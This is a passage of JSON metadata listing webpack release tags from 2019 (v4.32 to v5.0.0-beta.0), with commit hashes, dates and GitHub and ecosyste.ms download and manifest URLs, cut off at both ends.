ebpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/